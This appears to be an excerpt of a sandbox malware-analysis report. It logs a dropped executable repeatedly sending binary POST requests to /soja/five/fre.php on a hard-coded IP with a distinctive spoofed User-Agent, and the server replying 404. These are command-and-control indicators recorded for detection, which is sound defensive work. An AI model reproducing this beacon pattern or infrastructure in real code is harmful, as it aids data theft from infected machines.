                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_00404ED4 recv,18_2_00404ED4
                Source: unknownHTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 172Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:37:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
